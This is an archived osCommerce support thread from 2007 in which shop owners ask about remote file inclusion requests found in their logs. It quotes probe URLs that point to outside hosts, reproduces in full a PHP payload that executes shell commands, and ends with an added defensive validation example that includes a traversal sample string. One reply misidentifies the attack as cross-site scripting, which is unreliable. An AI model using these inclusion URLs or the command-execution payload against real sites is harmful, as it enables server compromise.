Guest
Posted January 20, 2007

Just found this in my who's online list. How did it get there? Is it a virus?

/index.php?Language=http%3A%2F%2Fbeforethehighway.com%2Fphpmyadm

Do not open the link to beforethehighway as it contains a virus. Any ideas on how to remove this or where it might be found on the site?
larp-fashion
Posted July 24, 2007

Hi, we currently have a similar problem. When I look at the who's online page, there are often page requests like this:

...shop/index.php?language=http://n2k.xlphp.net/atrix.txt

The content of the text file is:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
  $res = '';
  if (!empty($cfe)){
    if(function_exists('exec')){
      @exec($cfe,$res);
      $res = join("n",$res);
    }
    elseif(function_exists('shell_exec')){
      $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(function_exists('passthru')){
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    }
  }
  return $res;
}
exit;

May this be dangerous?

Martin
oschellas
Posted July 25, 2007

Seems you have been hacked through XSS (cross site scripting). Either you are using an older version of osCommerce which had some vulnerabilities, or you are using one or more contributions which are vulnerable to XSS. It would be a good thing to update to the latest osCommerce version and check your contributions. Maybe the above posters have some contributions in common?
larp-fashion
Posted July 27, 2007

Does an entry in the who's online like the above mean that the hack was successful, or was it just a try? Is it possible to forward requests with this to any site, maybe like

if length ($HTTP_GET_VARS['language'] )>2 redirect(anysite.com)

Regards
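
Added example, not part of the original thread and not osCommerce code: instead of the length test sketched in the last post, the `language` value can be checked against a fixed list so that the request value is only ever used as a lookup key and never reaches a file path. `LANGUAGE_FILES`, `DEFAULT_LANGUAGE` and both function names are hypothetical, and the language codes, file names and sample values are constructed.

```php
<?php
// Added example. LANGUAGE_FILES, DEFAULT_LANGUAGE and both function names are
// hypothetical; the codes and file names are constructed sample values.
const LANGUAGE_FILES = ['en' => 'english.php', 'de' => 'german.php', 'es' => 'espanol.php'];
const DEFAULT_LANGUAGE = 'en';

// Map a raw request value to a known language code; anything else gets the default.
function safe_language($raw): string
{
    if (!is_string($raw)) {              // ?language[]=x arrives as an array
        return DEFAULT_LANGUAGE;
    }
    $code = strtolower(trim($raw));
    return array_key_exists($code, LANGUAGE_FILES) ? $code : DEFAULT_LANGUAGE;
}

// True when the value has the shape of the requests quoted in this thread:
// a URL scheme, a directory traversal sequence, or a NUL byte.
function looks_like_inclusion_probe($raw): bool
{
    return is_string($raw)
        && preg_match('~^\s*[a-z][a-z0-9+.\-]*://|\.\.[/\\\\]|\x00~i', $raw) === 1;
}

// Constructed sample values; the URL uses a reserved example domain.
$samples = ['de', 'DE ', 'http://files.example/probe.txt', '../../etc/passwd', ['x'], null];

foreach ($samples as $raw) {
    $code = safe_language($raw);
    // The file name comes from the fixed table, never from the request value.
    printf(
        "%-36s probe=%-3s language=%s file=%s\n",
        json_encode($raw, JSON_UNESCAPED_SLASHES),
        looks_like_inclusion_probe($raw) ? 'yes' : 'no',
        $code,
        LANGUAGE_FILES[$code]
    );
}
```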
Archived
This topic is now archived and is closed to further replies.